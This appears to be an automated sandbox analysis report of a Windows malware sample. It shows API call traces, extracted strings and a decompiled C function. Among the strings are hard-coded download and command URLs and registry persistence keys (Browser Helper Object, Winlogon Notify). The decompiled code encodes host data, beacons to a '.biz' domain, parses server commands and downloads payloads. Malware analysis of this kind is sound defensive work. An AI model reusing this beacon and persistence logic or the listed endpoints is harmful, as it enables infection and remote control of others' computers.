Part of subcall function 004030DE: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,00407AA0,004122B0), ref: 004030FB
Part of subcall function 004030DE: RegQueryValueExA.ADVAPI32(?,SubshellState,00000000,0002001F,?,0000022A,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F), ref: 00403122
Part of subcall function 004030DE: RegCloseKey.ADVAPI32(0002001F,?,SubshellState,00000000,0002001F,?,0000022A,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F), ref: 0040312F
Part of subcall function 004030DE: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,00407AA0,004122B0), ref: 00403146
Part of subcall function 004030DE: RegQueryValueExA.ADVAPI32(0002001F,SubshellState,00000000,0002001F,?,0000022A,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F), ref: 0040316D

RegDeleteValueA.ADVAPI32(00000000,SubshellState,80000001,?,?,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0,00000000), ref: 00404BAE
RegCloseKey.ADVAPI32(?,00000000,SubshellState,80000001,?,?,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0), ref: 00404BBA
lstrcmpi.KERNEL32 ref: 00404BF6
lstrcmpi.KERNEL32 ref: 00404C0F
SetFileAttributesA.KERNEL32(?,00000080,?,?,00000000,SubshellState,80000001,?,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404C25
DeleteFileA.KERNEL32(?,?,00000080,?,?,00000000,SubshellState,80000001,?,?,?,40000000,00000000,00000000,00000002,00000080), ref: 00404C2B
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,00000000,SubshellState,80000001,?,?), ref: 00404C4C
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,00000000,SubshellState,80000001), ref: 00404C64
CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,?), ref: 00404C78
ReadFile.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00404C9B
lstrcpy.KERNEL32(?,00000000), ref: 00404D1B
lstrcpy.KERNEL32(?,?), ref: 00404D30
GetSystemDirectoryA.KERNEL32 ref: 00404E8C
lstrcat.KERNEL32(?,0041103E), ref: 00404EA2
lstrcat.KERNEL32(00000000,?), ref: 00404EA8
SetFileAttributesA.KERNEL32(00000000,00000000,?,0041103E,00000080,?,00000104,?,00000000,?,?,00000000,00000000,00000000,?,80000000), ref: 00404EAE
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,0041103E,00000080,?,00000104,?,00000000), ref: 00404EC6
WriteFile.KERNEL32(?,0040E640,00001400,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,00000104), ref: 00404EFC
SetFileTime.KERNEL32(?,?,?,?,?,0040E640,00001400,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404F27
CloseHandle.KERNEL32(?,?,0040E640,00001400,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080), ref: 00404F33
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?), ref: 00404B0E

Part of subcall function 00401251: RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00411035,00000004), ref: 004012B2

Strings

opera.exe, xrefs: 00405806
seamonkey.exe, xrefs: 0040580B
http://utbidet-ugeas.biz/d/cc, xrefs: 00405600
;, xrefs: 004057F2
winrnt.exe, xrefs: 00405262
Debugger, xrefs: 0040591A
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}, xrefs: 00405AEC
%AppData%\, xrefs: 00404FAB, 0040508D, 004051C2
CLSID\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\InProcServer32, xrefs: 00405A95
T, xrefs: 0040564F
%CommonProgramFiles%\System\, xrefs: 004051AB
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 00405579, 004059AE, 004059D4, 00405B42
explorer.exe, xrefs: 00404F5D, 0040581F
g00d d0gg, xrefs: 00405B6F, 00405B95, 00405BA5
ConnPred, xrefs: 004055B3, 0040569F
p A, xrefs: 004055DC
grazie.gif, xrefs: 00405676
mozilla.exe, xrefs: 00405810
SubshellState, xrefs: 00404BA8, 004059F8
Both, xrefs: 00405AC5
DLLName, xrefs: 00405A65
iexplore.exe, xrefs: 0040581A
StubPath, xrefs: 00404B56, 004058AF
tombul.gif, xrefs: 00405790
winlogon.exe, xrefs: 00404F42
kernel32.dll, xrefs: 00404F6D, 00404F8C
I, xrefs: 00405642
firefox.exe, xrefs: 00405815
UseExtProfile, xrefs: 004056BE, 00405721
ThreadingModel, xrefs: 00405ACE
IsInstalled, xrefs: 00404B38, 00405891
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}, xrefs: 00405A35
Startup, xrefs: 00405A78, 00405A81
UseDflProfile, xrefs: 00405744, 004057A9
h`r@, xrefs: 0040496E
http://69.50.173.166/gdnOT2424.exe, xrefs: 004056F8

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: File$Close$Value$Create$Handlelstrcat$AttributesDeleteWritelstrcpy$DirectoryOpenQuerySystemTimelstrcmpilstrlen$MutexObjectReadSingleSizeSleepWait
String ID: %AppData%\$%CommonProgramFiles%\System\$;$Both$CLSID\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\InProcServer32$ConnPred$DLLName$Debugger$I$IsInstalled$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}$Startup$StubPath$SubshellState$T$ThreadingModel$UseDflProfile$UseExtProfile$explorer.exe$firefox.exe$g00d d0gg$grazie.gif$h`r@$http://69.50.173.166/gdnOT2424.exe$http://utbidet-ugeas.biz/d/cc$iexplore.exe$kernel32.dll$mozilla.exe$opera.exe$p A$seamonkey.exe$tombul.gif$winlogon.exe$winrnt.exe
API String ID: 4274377182-2342620408
Opcode ID: ae81e21a29356197e7d93d0ea1040b51f53f6fdb8ebbb928199e98e848617d92
Instruction ID: 95f2c617460066549a7d62f87e1d991e293c345f820f5df1bc7e303eabba92b6
Opcode Fuzzy Hash: ae81e21a29356197e7d93d0ea1040b51f53f6fdb8ebbb928199e98e848617d92
Instruction Fuzzy Hash: 4F92F970288741BAE730A761CC46F9B7699EF80704F50493FB785B91D2D6BCA8448B6F

Uniqueness

Uniqueness Score: -1.00%

Function 0040265F Relevance: 68.9, APIs: 30, Strings: 9, Instructions: 697
registrytimesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E0040265F(signed int _a4) {
				char _v269;
				char _v270;
				char _v271;
				void _v272;
				char _v336;
				char _v592;
				void* _v596;
				void* _v600;
				int _v604;
				long _v608;
				signed int _v612;
				void* _v616;
				char _v620;
				signed int _v624;
				void* _v628;
				long _v632;
				struct _FILETIME _v640;
				signed int _v644;
				signed int _v648;
				struct _SECURITY_ATTRIBUTES* _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				struct _SECURITY_ATTRIBUTES** _v668;
				void* _v669;
				signed int _v672;
				void* _v673;
				void* _v677;
				void* _v681;
				signed int _t222;
				intOrPtr* _t225;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t234;
				short _t235;
				short _t236;
				short _t237;
				signed int _t240;
				signed int _t243;
				signed int _t244;
				CHAR* _t249;
				int _t250;
				void* _t256;
				signed int _t265;
				signed int _t266;
				signed int _t270;
				void* _t271;
				signed int _t273;
				signed int _t274;
				signed char _t275;
				void* _t277;
				signed int _t279;
				signed int _t281;
				signed int _t287;
				void* _t288;
				signed int _t297;
				long _t298;
				intOrPtr _t310;
				struct _SECURITY_ATTRIBUTES** _t321;
				signed int _t322;
				char* _t327;
				signed int _t334;
				signed int _t337;
				signed char _t339;
				signed int _t345;
				signed int _t349;
				signed int _t350;
				signed char _t352;
				signed int _t355;
				signed int _t358;
				signed int _t359;
				long _t362;
				intOrPtr* _t368;
				void* _t375;
				CHAR* _t381;
				signed int* _t382;
				char* _t383;
				signed int _t384;
				signed int _t385;
				int* _t387;
				signed int _t391;
				intOrPtr* _t393;
				signed int _t394;
				signed int* _t396;
				signed int _t397;
				intOrPtr _t399;
				signed int _t400;
				signed char* _t404;
				signed int _t408;
				signed int _t409;
				void* _t410;
				signed int _t411;
				signed int _t416;
				signed int _t417;
				signed char _t419;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t429;
				signed int _t432;
				signed int _t442;
				signed int _t443;
				signed char* _t444;
				signed int _t450;
				CHAR* _t452;
				signed int* _t457;
				signed int _t460;
				signed int _t462;
				signed int _t463;
				signed int _t466;
				signed int _t467;
				void* _t468;
				void* _t469;
				void* _t470;

				_t469 = _t468 - 0x290;
				if(RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0, 0, 0xf003f, 0x408778,  &_v596, 0) != 0) {
					_v596 = 0;
				}
				RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0, 0, 0xf003f, 0x408778,  &_v600, 0);
				_v604 = 0x12;
				_t410 = _v596;
				if(_t410 == 0 || RegQueryValueExA(_t410, "Default Flags", 0, 0, 0x412190,  &_v604) != 0) {
					if(RegQueryValueExA(_v600, "Default Flags", 0, 0, 0x412190,  &_v604) == 0) {
						goto L8;
					} else {
						 *0x412198 = 0x33abd8f4;
						GetSystemTimeAsFileTime(0x412190);
						 *0x41219c = 0;
						_t375 = _v596;
						 *0x4121a0 = 0x31;
						_t475 = _t375;
						if(_t375 != 0) {
							RegSetValueExA(_t375, "Default Flags", 0, 3, 0x412190, 0x12);
						}
						RegSetValueExA(_v600, "Default Flags", 0, 3, 0x412190, 0x12);
						goto L9;
					}
				} else {
					L8:
					 *0x4121a0 = 0x31;
					while(1) {
						L9:
						_t222 = E00402427(_t475);
						if(_t222 != 0) {
							goto L117;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t225 =  *0x4121c0;
							if(_t225 == 0) {
								_t469 = _t469 - 0x14;
								_t450 =  &_v677 & 0xfffffff0;
								__eflags = _t450;
								 *_t450 = 0;
							} else {
								_t387 =  &_v604;
								_v604 = 0;
								 *_t225(0, _t387, 0);
								E00405C00();
								_t450 =  &_v669 & 0xfffffff0;
								 *_t450 = 0;
								 *0x4121c0(_t450, _t387, 0);
							}
							_t381 =  &_v592;
							_t226 = wsprintfA(_t381, "%u.%u.%u.%s",  *0x4120f4,  *0x4120f8,  *0x4120fc, 0x412104);
							_push(_t381);
							L00405E40();
							_t470 = _t469 + 0x18;
							_v644 = _t226 + 0x18;
							_t411 = _v644;
							E00405C00();
							_t460 =  &_v673 & 0xfffffff0;
							 *_t460 = 2;
							_t231 = E004010B2();
							 *(_t460 + 1) = _t231;
							_v648 = _t231;
							_t232 =  *0x41219c; // 0x0
							 *((short*)(_t460 + 9)) = 0x31;
							 *(_t460 + 5) = _t232;
							asm("sbb eax, eax");
							_t234 =  !_t232 & 0x00000002;
							if( *0x41219c == 0) {
								_t234 = _t234 | 0x00000004;
							}
							L15:
							if( *0x412100 == 2) {
								_t234 = _t234 | 0x00000008;
							}
							if(_a4 == 0) {
								_t234 = _t234 | 0x00000010;
							}
							if( *0x412020 != 0) {
								_t234 = _t234 | 0x00000020;
							}
							if( *0x412030 != 0) {
								_t234 = _t234 | 0x00000040;
							}
							 *(_t460 + 0xb) = _t234;
							_t235 =  *0x4120e4; // 0x92e4389c
							 *((short*)(_t460 + 0xf)) = _t235;
							_t236 =  *0x4120e8; // 0x68382e89
							 *((short*)(_t460 + 0x11)) = _t236;
							_t237 =  *0x4120ec; // 0x48489949
							 *((char*)(_t460 + 0x15)) = 0;
							 *((char*)(_t460 + 0x16)) = 0;
							 *((short*)(_t460 + 0x13)) = _t237;
							if(E004025C3() == 0) {
								 *(_t460 + 0xb) =  *(_t460 + 0xb) | 0x00000001;
							}
							_v608 = 0;
							_v612 = _t460 + 0x17;
							_t240 = 0;
							while(_t240 <  *_t450) {
								_t399 =  *((intOrPtr*)(_t240 * 0x18 + _t450 + 4));
								_t411 = _t411 & 0xffffff00 | _t399 != 0x00000000;
								if((_t411 & (0 | _t399 != 0x0100007f)) != 0) {
									_v644 = _v644 + 4;
									_t368 = _v612;
									 *_t368 = _t399;
									_v612 = _t368 + 4;
									 *((char*)(_t460 + 0x15)) =  *((char*)(_t460 + 0x15)) + 1;
								}
								_t240 = _v608 + 1;
								_v608 = _t240;
							}
							_t382 = _t460 + 5;
							_push( &_v592);
							_push(_v612);
							L00405E20();
							_t243 = _t382 - _t460;
							__eflags = _t243;
							_v608 = _t243;
							while(1) {
								__eflags = _t243 - _v644;
								if(_t243 >= _v644) {
									break;
								}
								 *_t382 =  *_t382 ^ _v648;
								_t382 =  &(_t382[1]);
								_t243 = _v608 + 4;
								_v608 = _t243;
							}
							_t244 =  *0x412198; // 0x0
							_t383 =  &_v336;
							E004014F6(_t244, _t383);
							E00405C00();
							_t249 =  &_v681 & 0xfffffff0;
							_t384 = _t460;
							_v612 = _t249;
							_t250 = wsprintfA(_t249, "http://%s.biz/d/N?", _t383);
							_v608 = 0;
							_t469 = _t470 + 0xc;
							_t452 = _t250 + _v612;
							__eflags = _v644;
							if(_v644 == 0) {
								L35:
								_t385 = E004019E8(_v612, 0, 1);
								__eflags = _t385;
								if(_t385 == 0) {
									L110:
									GetSystemTimeAsFileTime( &_v640);
									_t222 = E004014D8( &_v640, 0x412190);
									__eflags = _t222 - 0x2a2ff;
									if(_t222 <= 0x2a2ff) {
										break;
									}
									_t416 = _v640.dwHighDateTime;
									_t396 =  &_v336;
									 *0x412194 = _t416;
									_t417 = _t416 | 0xffffffff;
									__eflags = _v336;
									 *0x412190 = _v640.dwLowDateTime;
									while(__eflags != 0) {
										_t419 = _t417 ^  *_t396;
										_t396 =  &(_t396[0]);
										__eflags =  *_t396;
										_t417 = _t417 >> 0x00000008 ^  *(0x410880 + (_t419 & 0x000000ff) * 4);
									}
									_t256 = _v596;
									 *0x412198 =  !_t417;
									__eflags = _t256;
									if(_t256 != 0) {
										RegSetValueExA(_t256, "Default Flags", 0, 3, 0x412190, 0x12);
									}
									_t222 = RegSetValueExA(_v600, "Default Flags", 0, 3, 0x412190, 0x12);
									break;
								}
								__eflags = _a4;
								if(_a4 == 0) {
									ExitProcess(0);
								}
								__eflags =  *_t385;
								if( *_t385 == 0) {
									_v608 = E00401625( *(_t385 + 4),  &_v272, 0x100, 0x28);
								} else {
									_t358 = InternetReadFile( *(_t385 + 4),  &_v272, 0x100,  &_v608);
									__eflags = _t358;
									if(_t358 == 0) {
										_v608 = 0xffffffff;
									}
								}
								_t265 = E00401F59(_t385);
								_t397 = _v608;
								__eflags = _t397 - 0xffffffff;
								_t266 = _t265 & 0xffffff00 | _t397 != 0xffffffff;
								__eflags = _t397;
								_t423 = 0 | _t397 != 0x00000000;
								__eflags = _t266 & _t423;
								if((_t266 & _t423) == 0) {
									goto L110;
								} else {
									__eflags = _v271 - 0x20;
									if(_v271 != 0x20) {
										goto L110;
									}
									__eflags = (_v272 & 0x000000ff) - 0x30 - 4;
									if((_v272 & 0x000000ff) - 0x30 > 4) {
										goto L110;
									}
									_t424 =  &_v612;
									 *((char*)( &_v272 + _t397)) = 0;
									_t270 = E0040136B( &_v270, _t424, 0x10);
									_v608 = _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										__eflags =  *0x41219c;
										if( *0x41219c == 0) {
											 *0x41219c = _t270;
										}
									}
									GetSystemTimeAsFileTime(0x412190);
									_t271 = _v596;
									__eflags = _t271;
									if(_t271 != 0) {
										RegSetValueExA(_t271, "Default Flags", 0, 3, 0x412190, 0x12);
									}
									RegSetValueExA(_v600, "Default Flags", 0, 3, 0x412190, 0x12);
									_t222 = _v272;
									__eflags = _t222 - 0x31;
									if(__eflags == 0) {
										_t400 = _v612;
										__eflags = _t400;
										if(_t400 == 0) {
											goto L110;
										}
										_t273 =  *_t400 & 0x000000ff;
										__eflags = _t273 - 0x20;
										_t425 = _t424 & 0xffffff00 | _t273 == 0x00000020;
										__eflags = _t273 - 9;
										_t104 = _t273 == 9;
										__eflags = _t104;
										_t274 = _t273 & 0xffffff00 | _t104;
										while(1) {
											_t275 = _t274 | _t425;
											__eflags = _t275 & 0x00000001;
											if((_t275 & 0x00000001) == 0) {
												break;
											}
											_t287 = _t400 + 1;
											_v612 = _t287;
											_t432 =  *(_t400 + 1) & 0x000000ff;
											__eflags = _t432;
											if(_t432 == 0) {
												goto L110;
											}
											__eflags = _t432 - 0x20;
											_t400 = _t287;
											_t274 = _t287 & 0xffffff00 | _t432 == 0x00000020;
											__eflags = _t432 - 9;
											_t425 = _t432 & 0xffffff00 | _t432 == 0x00000009;
										}
										_t277 = E0040134D(_v612, 0x20);
										__eflags = _t277 - 1;
										_t455 = _t277;
										_t462 = _v612;
										asm("sbb edi, 0xffffffff");
										_t279 = E0040134D(_t277, 0x55);
										__eflags = _t279;
										_t281 = E0040134D(_t277, 0x43);
										__eflags = _t281;
										_t429 = 0 | _t279 == 0x00000000;
										if(_t281 != 0) {
											_t429 = _t429 | 0x00000002;
											__eflags = _t429;
										}
										_push(_t429);
										_push(0);
										_t222 = E0040211B(_t462, 0);
										__eflags = _t222;
										if(_t222 != 0) {
											_t222 = E0040134D(_t455, 0x52);
											__eflags = _t222;
											if(_t222 != 0) {
												_t222 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &_v616, 0);
												__eflags = _t222;
												if(_t222 == 0) {
													_v620 = 0x1e;
													RegSetValueExA(_v616, "g00d d0gg", 0, 4,  &_v620, 4);
													_t222 = RegCloseKey(_v616);
												}
											}
										}
										break;
									} else {
										if(__eflags > 0) {
											__eflags = _t222 - 0x33;
											if(_t222 == 0x33) {
												 *0x412198 = 0x33abd8f4;
												_t288 = _v596;
												__eflags = _t288;
												if(_t288 != 0) {
													RegSetValueExA(_t288, "Default Flags", 0, 3, 0x412190, 0x12);
												}
												RegSetValueExA(_v600, "Default Flags", 0, 3, 0x412190, 0x12);
												Sleep(0x1388);
												L10:
												_t225 =  *0x4121c0;
												if(_t225 == 0) {
													_t469 = _t469 - 0x14;
													_t450 =  &_v677 & 0xfffffff0;
													__eflags = _t450;
													 *_t450 = 0;
												} else {
													_t387 =  &_v604;
													_v604 = 0;
													 *_t225(0, _t387, 0);
													E00405C00();
													_t450 =  &_v669 & 0xfffffff0;
													 *_t450 = 0;
													 *0x4121c0(_t450, _t387, 0);
												}
												_t381 =  &_v592;
												_t226 = wsprintfA(_t381, "%u.%u.%u.%s",  *0x4120f4,  *0x4120f8,  *0x4120fc, 0x412104);
												_push(_t381);
												L00405E40();
												_t470 = _t469 + 0x18;
												_v644 = _t226 + 0x18;
												_t411 = _v644;
												E00405C00();
												_t460 =  &_v673 & 0xfffffff0;
												 *_t460 = 2;
												_t231 = E004010B2();
												 *(_t460 + 1) = _t231;
												_v648 = _t231;
												_t232 =  *0x41219c; // 0x0
												 *((short*)(_t460 + 9)) = 0x31;
												 *(_t460 + 5) = _t232;
												asm("sbb eax, eax");
												_t234 =  !_t232 & 0x00000002;
												if( *0x41219c == 0) {
													_t234 = _t234 | 0x00000004;
												}
												goto L15;
											}
											__eflags = _t222 - 0x34;
											if(_t222 == 0x34) {
												__eflags = _v270 - 0x20;
												_t433 =  &_v270;
												_v624 =  &_v270;
												if(_v270 <= 0x20) {
													L74:
													 *_v624 = 0;
													_t222 = E00401CB0(_t433);
													__eflags = _t222;
													_t463 = _t222;
													if(_t222 == 0) {
														L79:
														 *0x4122e0 = 0;
														break;
													}
													_t391 = 0x400;
													_v660 = E00401000(0x400);
													_v632 = 0;
													while(1) {
														_t297 = E00401E00(_t463, _v660 + _v632, _t391 - _v632);
														__eflags = _t297;
														if(_t297 == 0) {
															break;
														}
														__eflags = _t297 - 0xffffffff;
														if(_t297 != 0xffffffff) {
															_t298 = _t297 + _v632;
															__eflags = _t298 - _t391;
															_v632 = _t298;
															if(_t298 >= _t391) {
																_t391 = _t391 + 0x400;
																__eflags = _t391;
																_v660 = E0040100F(_v660, _t391);
															}
															continue;
														}
														E00401F59(_t463);
														L78:
														_t222 = E00401029(_v660);
														goto L79;
													}
													E00401F59(_t463);
													__eflags = _v632 + 1 - _t391;
													if(_v632 + 1 >= _t391) {
														__eflags = _t391 + 1;
														_v660 = E0040100F(_v660, _t391 + 1);
													}
													 *((char*)(_v632 + _v660)) = 0;
													_t310 = E00401DD7(_v660, _v632);
													__eflags =  *0x412300 - _t310; // 0x0
													_v664 = _t310;
													if(__eflags != 0) {
														L87:
														_v652 = E0040136B(_v660,  &_v624, 0);
														E004014BC( &_v624);
														_t315 = _v624;
														__eflags =  *_v624;
														if( *_v624 == 0) {
															goto L78;
														}
														_v656 = E0040136B(_t315,  &_v624, 0);
														E004014BC( &_v624);
														__eflags =  *_v624;
														if( *_v624 == 0) {
															goto L78;
														}
														_t321 = E00401000(8);
														_v668 = _t321;
														 *_t321 = 0;
														_t321[1] = 0;
														_t322 =  &(_t321[1]);
														__eflags = _t322;
														_v672 = _t322;
														do {
															_v628 = _v624;
															E004014BC( &_v628);
															_t326 = _v624;
															__eflags =  *_v624 - 0xa;
															if( *_v624 == 0xa) {
																goto L103;
															}
															_t442 =  &_v624;
															_v632 = E0040136B(_t326, _t442, 0);
															_t404 = _v624;
															_t337 =  *_t404 & 0x000000ff;
															__eflags = _t337 - 0x20;
															_t443 = _t442 & 0xffffff00 | _t337 == 0x00000020;
															__eflags = _t337 - 9;
															_t339 = _t337 & 0xffffff00 | _t337 == 0x00000009 | _t443;
															__eflags = _t339 & 0x00000001;
															if((_t339 & 0x00000001) == 0) {
																L94:
																_t393 = E00401000(_v628 - _v624 + 8);
																_t444 = _v624;
																_t187 = _t393 + 8; // 0x8
																_t457 = _t187;
																_t466 = _v628 - _t444;
																__eflags = _t466;
																if(_t466 == 0) {
																	do {
																		L101:
																		_t345 =  *_t444 & 0x000000ff;
																		_t444 =  &(_t444[1]);
																		__eflags = _t345;
																	} while (_t345 != 0);
																	L102:
																	 *_t393 = _v632;
																	_t191 = _t393 + 4; // 0x4
																	 *_v672 = _t393;
																	_v672 = _t191;
																	 *(_t393 + 4) = _v668[1];
																	goto L103;
																}
																_t408 = _t466;
																while(1) {
																	_t408 = _t408 - 1;
																	__eflags = _t408;
																	if(_t408 == 0) {
																		break;
																	}
																	_t349 =  *_t444 & 0x000000ff;
																	_t444 =  &(_t444[1]);
																	 *_t457 = _t349;
																	_t457 =  &(_t457[0]);
																	__eflags = _t349;
																	if(_t349 != 0) {
																		continue;
																	}
																	__eflags = _t408;
																	if(_t408 != 0) {
																		goto L102;
																	}
																	break;
																}
																__eflags = _t466;
																if(_t466 != 0) {
																	 *_t457 = 0;
																}
																goto L101;
															}
															_t409 =  &(_t404[1]);
															__eflags = _t409;
															do {
																_v624 = _t409;
																_t409 = _t409 + 1;
																_t350 =  *(_t409 - 1) & 0x000000ff;
																__eflags = _t350 - 0x20;
																_t443 = _t443 & 0xffffff00 | _t350 == 0x00000020;
																__eflags = _t350 - 9;
																_t352 = _t350 & 0xffffff00 | _t350 == 0x00000009 | _t443;
																__eflags = _t352 & 0x00000001;
															} while ((_t352 & 0x00000001) != 0);
															goto L94;
															L103:
															_t327 = _v628;
															_v624 = _t327;
															__eflags =  *_t327;
														} while ( *_t327 != 0);
														E00401029(_v660);
														 *0x4122f0 = _v656;
														_t467 =  *0x412050; // 0x0
														 *0x4122e0 = _v652;
														 *0x412050 = _v668;
														 *0x412300 = _v664;
														_t222 = CloseHandle(CreateThread(0, 0x10000, E00401FFD, 0, 0,  &_v632));
														__eflags = _t467;
														if(_t467 == 0) {
															break;
														}
														__eflags =  *_t467;
														if( *_t467 != 0) {
															break;
														}
														_t394 =  *(_t467 + 4);
														__eflags = _t394;
														while(__eflags != 0) {
															_t334 = _t394;
															_t394 =  *(_t394 + 4);
															E00401029(_t334);
															__eflags = _t394 -  *(_t467 + 4);
														}
														_t222 = E00401029(_t467);
														break;
													} else {
														__eflags =  *0x412050;
														if( *0x412050 != 0) {
															goto L78;
														}
														goto L87;
													}
												}
												_t355 =  &_v269;
												do {
													_v624 = _t355;
													_t355 = _t355 + 1;
													__eflags =  *((char*)(_t355 - 1)) - 0x20;
												} while ( *((char*)(_t355 - 1)) > 0x20);
												goto L74;
											}
											goto L110;
										}
										__eflags = _t222 - 0x30;
										if(_t222 == 0x30) {
											goto L79;
										}
										goto L110;
									}
								}
							} else {
								goto L34;
							}
							do {
								L34:
								_t359 =  *_t384 & 0x000000ff;
								_t384 = _t384 + 1;
								_push(_t359);
								_t452 =  &(_t452[2]);
								wsprintfA(_t452, "%02X");
								_t469 = _t469 + 0xc;
								_t362 = _v608 + 1;
								__eflags = _t362 - _v644;
								_v608 = _t362;
							} while (_t362 < _v644);
							goto L35;
						}
						L117:
						__eflags = _a4 - 1;
						asm("sbb eax, eax");
						Sleep((_t222 & 0xfff74d70) + 0x927c0);
					}
				}
			}

0x0040266b
0x00402695
0x00402697
0x00402697
0x004026c4
0x004026c9
0x004026d3
0x004026db
0x00402722
0x00000000
0x00402724
0x00402729
0x00402733
0x00402738
0x00402742
0x00402748
0x00402751
0x00402753
0x00402766
0x00402766
0x00402781
0x00000000
0x00402781
0x00402788
0x00402788
0x00402788
0x00402791
0x00402791
0x00402791
0x00402798
0x00000000
0x00000000
0x00000000
0x00000000
0x0040279e
0x0040279e
0x0040279e
0x004027a5
0x004027e8
0x004027ef
0x004027ef
0x004027f2
0x004027a7
0x004027a9
0x004027b0
0x004027bc
0x004027ca
0x004027d3
0x004027d6
0x004027e0
0x004027e0
0x004027fd
0x0040281b
0x00402820
0x00402821
0x00402829
0x0040282c
0x00402832
0x00402841
0x0040284a
0x0040284d
0x00402850
0x00402855
0x0040285f
0x00402865
0x0040286a
0x00402870
0x00402873
0x00402877
0x00402881
0x00402883
0x00402883
0x00402886
0x0040288d
0x0040288f
0x0040288f
0x00402896
0x00402898
0x00402898
0x004028a2
0x004028a4
0x004028a4
0x004028ae
0x004028b0
0x004028b0
0x004028b3
0x004028b6
0x004028bb
0x004028bf
0x004028c4
0x004028c8
0x004028cd
0x004028d1
0x004028d5
0x004028e0
0x004028e2
0x004028e2
0x004028e6
0x004028f3
0x004028f9
0x004028fb
0x00402902
0x00402908
0x00402918
0x0040291a
0x00402921
0x00402927
0x0040292c
0x00402932
0x00402932
0x0040293b
0x0040293c
0x0040293c
0x0040294a
0x0040294d
0x0040294e
0x00402954
0x0040295b
0x0040295b
0x0040295d
0x00402963
0x00402963
0x00402969
0x00000000
0x00000000
0x00402971
0x00402973
0x0040297c
0x0040297f
0x0040297f
0x00402987
0x0040298c
0x00402994
0x004029a6
0x004029af
0x004029b3
0x004029bb
0x004029c1
0x004029c6
0x004029d2
0x004029d5
0x004029db
0x004029e2
0x00402a0f
0x00402a1e
0x00402a20
0x00402a23
0x0040301b
0x00403022
0x0040302e
0x00403033
0x00403038
0x00000000
0x00000000
0x0040303e
0x00403044
0x00403050
0x00403056
0x00403059
0x00403060
0x00403065
0x0040306c
0x0040306e
0x00403079
0x0040307c
0x0040307c
0x00403080
0x00403088
0x0040308e
0x00403090
0x004030a3
0x004030a3
0x004030be
0x00000000
0x004030be
0x00402a29
0x00402a2d
0x00402a31
0x00402a31
0x00402a36
0x00402a3f
0x00402a77
0x00402a41
0x00402a51
0x00402a57
0x00402a59
0x00402a5b
0x00402a5b
0x00402a59
0x00402a80
0x00402a85
0x00402a8b
0x00402a8e
0x00402a93
0x00402a95
